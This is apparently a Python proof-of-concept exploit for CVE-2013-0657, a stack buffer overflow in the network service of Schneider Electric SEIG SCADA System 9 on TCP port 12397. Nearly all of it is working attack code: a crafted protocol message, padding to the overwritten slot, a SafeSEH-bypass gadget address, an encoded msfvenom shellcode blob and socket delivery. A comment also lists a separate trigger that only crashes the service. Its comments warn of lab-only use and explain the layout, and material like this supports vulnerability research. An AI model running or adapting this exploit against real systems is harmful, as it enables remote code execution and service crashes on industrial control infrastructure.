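#!/usr/bin/env python
# Title: SEIG SCADA SYSTEM 9 - Remote Code Execution
# Author: Alejandro Parodi
# Date: 2018-08-17
# Vendor Homepage: https://www.schneider-electric.com
# Software Link: https://www.schneider-electric.ie/en/download/document/V9_Full_installation_package_register_and_receive_file/
# Version: v9
# Tested on: Windows7 x86
# CVE: CVE-2013-0657
# References:
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0657
#
# Proof of concept for a stack overflow in the SEIG SCADA System 9 network
# service listening on TCP/12397.  One oversized message overwrites a return
# address / exception-handler slot with a pop/pop/ret gadget from exprsrv.dll
# (a module compiled without SafeSEH) and runs an msfvenom "calc" payload.
#
# WARNING: this crashes the target service whether or not the shellcode runs.
# Only use it against an isolated lab host you are authorised to test; the
# gadget address below is specific to the exprsrv.dll build the author tested
# and must be re-verified (e.g. with mona's !safeseh) for any other build.
#
# Usage: python exploit.py [target_ip] [target_port]

import socket
import struct
import sys

# Lab target used by the author; override on the command line.
DEFAULT_IP = "192.168.0.23"
DEFAULT_PORT = 12397
# Seconds to wait for connect/recv.  Without a timeout the original script
# blocked forever in recv() because the crashed service never answers.
SOCKET_TIMEOUT = 5.0

# DoS trigger found during the research ("CRUNCHBASE UNEXPECTED PARAMETER"),
# kept for reference only; it is not sent by this script:
#   length = b"\x00\x70\x00\x00\x00\x00\x00\x00"
#   message = b"\x00\x70AA\x65\x00\x00\x00AAAAAAAAAAAAAAAA\x00\x00\x00\x00" + b"B" * 28644
#   payload = length + message

# --- Exploit message layout -------------------------------------------------
# Eight-byte message header: 0x6014 little-endian followed by four fixed bytes.
MESSAGE_HEADER = struct.pack("<L", 0x6014) + b"\x66\x66\x07\x00"
# Sixteen bytes of protocol data preceding the overflowing field; the trailing
# 0x6000 is big-endian, unlike the header word.
MESSAGE_PROTOCOL_DATA = (
    b"\x10\x00\x00\x00"
    + b"\x19"
    + b"\x00\x00\x00\x00\x00"
    + b"\x04"
    + b"\x00\x00\x00"
    + struct.pack(">H", 0x6000)
)
# Filler up to the overwritten slot (offset 3344 into the variable field).
PADDING_LEN = 3344
PADDING = b"B" * PADDING_LEN
# pop, pop, ret in exprsrv.dll (Windows library without SafeSEH) -- build-specific.
POP_POP_RET = 0x0F9C520B
EIP_SAFESEH_BYPASS_ADDRESS = struct.pack("<L", POP_POP_RET)
# Sled of 0x41 (inc ecx) rather than 0x90, per the author's bad-char findings.
NOP_SLED_LEN = 100
NOP_SLED = b"\x41" * NOP_SLED_LEN

# Shellcode generated with:
#   msfvenom -a x86 --platform windows -p windows/exec cmd=calc EXITFUNC=thread \
#            -e x86/shikata_ga_nai -i 5 -b '\x00\xFF\x0A\x0D' -f python
# EXITFUNC=thread matters: without it the service spins in a loop after the
# payload runs and exhausts the VM's resources.
SHELLCODE = (
    b"\xda\xcb\xbd\x0f\x83\x69\x70\xd9\x74\x24\xf4\x58\x31"
    b"\xc9\xb1\x4b\x83\xe8\xfc\x31\x68\x14\x03\x68\x1b\x61"
    b"\x9c\xa9\xcf\xd8\x3a\xb3\x6e\xfc\x1c\x37\x54\xf6\xc7"
    b"\x93\x5d\x47\xb3\xd2\x35\xb1\x3f\x7d\xdc\x42\xd7\x81"
    b"\x59\x48\x93\x7b\x98\x70\x2a\x6b\x98\x14\xea\xc5\x54"
    b"\x17\x7c\x8d\x25\x69\x60\x27\x1e\xc7\x8a\x6a\xd8\xcf"
    b"\xb6\xc3\x9d\x5a\x83\xd6\xea\x88\x14\x7d\x5a\x55\x71"
    b"\x90\x85\xb8\x37\x9e\x3e\xd7\x1a\x76\xf8\xb1\xb9\x63"
    b"\xb7\xef\xa3\xa6\xc0\xb8\x12\xb4\x18\x62\x1a\xe1\x9e"
    b"\x6f\x7e\xa2\x86\x6c\xf7\x3a\x31\xbd\x55\x42\x10\xad"
    b"\x89\x16\xa0\xb8\x6a\xd6\x4c\x20\xd9\xad\x81\x58\x77"
    b"\x0b\xa3\xaa\xba\x2c\x49\xf0\x26\xaa\xab\xce\x5a\xc3"
    b"\x41\x69\x60\xc4\x58\x71\x71\x9c\x3f\xbe\xc2\xbc\x49"
    b"\xdd\xab\x89\xf0\x46\xcb\x1a\x8a\xf1\xdb\xe5\x54\x1f"
    b"\xfb\x30\x3b\xb1\x17\x97\xb2\x3e\x31\xf8\x26\x13\x9c"
    b"\x16\xdd\x26\x7a\xe3\x9b\x6e\x29\x77\x49\xc7\x97\x98"
    b"\x39\x7b\x5f\xcd\xeb\x4a\x39\x6e\x66\x04\xbc\x6c\xa6"
    b"\x87\x01\x63\x4d\xf3\x35\xc9\x74\x35\xdf\xe7\x1f\x0c"
    b"\xd0\x69\x80\x8c\x5c\xde\x63\xfc\x19\x1b\x8e\x24\x3b"
    b"\x7e\x01\x97\x6f\x67\x8f\x07\x3f\x32\x13\x23\x80\x7e"
    b"\x9a\x01\x5a\xc0\x3c\xf9\xf5\x5a\x04\xb0\x54\x46\x0c"
    b"\xfb\x21\x4d\xd7\xe0\xb4\x02\xe5\x4c\x04\x5a\x5e\x37"
    b"\xd1\x61\x6d\xe1\x4d\xe8\xa8\xdf\x26\xdb\x55\x5a\x60"
    b"\x85\x68\x05\x6a\x21\x73\xdf\x73\xa4\xef\x26\x02\x7e"
    b"\xb0\xb1\xa6\xb1\xac\x15\x0f\x80\x34\xae\xe4\x8a"
)
# Trailing filler so the message reaches the size that triggers the overflow.
JUNK = b"JUNK" * 5202  # 20808 bytes


def build_payload():
    """Assemble the complete exploit message.

    Returns:
        bytes: header + protocol data + padding + gadget address + sled +
        shellcode + junk, in that order, exactly as the original PoC sent it.
    """
    return b"".join([
        MESSAGE_HEADER,
        MESSAGE_PROTOCOL_DATA,
        PADDING,
        EIP_SAFESEH_BYPASS_ADDRESS,
        NOP_SLED,
        SHELLCODE,
        JUNK,
    ])


def send_payload(payload, ip=DEFAULT_IP, port=DEFAULT_PORT, timeout=SOCKET_TIMEOUT):
    """Deliver *payload* to ip:port over TCP and read up to 10 reply bytes.

    Uses sendall() so the ~24 KB message is not truncated by a partial send,
    and always closes the socket.

    Returns:
        bytes: whatever the service answered (empty if it timed out, which is
        the expected outcome once the handler has been overwritten).

    Raises:
        socket.error: if the connection cannot be established or the send fails.
    """
    sock = socket.create_connection((ip, port), timeout)
    try:
        sock.sendall(payload)
        try:
            return sock.recv(10)
        except socket.timeout:
            return b""
    finally:
        sock.close()


def main(argv=None):
    """Entry point: optional positional args are target IP and port.

    Returns:
        int: 0 on delivery, 1 if the target could not be reached.
    """
    args = sys.argv[1:] if argv is None else argv
    ip = args[0] if len(args) > 0 else DEFAULT_IP
    port = int(args[1]) if len(args) > 1 else DEFAULT_PORT

    payload = build_payload()
    print("Payload length: %d" % len(payload))

    try:
        reply = send_payload(payload, ip, port)
    except socket.error as exc:
        print("Connection to %s:%d failed: %s" % (ip, port, exc))
        return 1
    print("Received %d byte(s) in reply" % len(reply))
    return 0


if __name__ == "__main__":
    sys.exit(main())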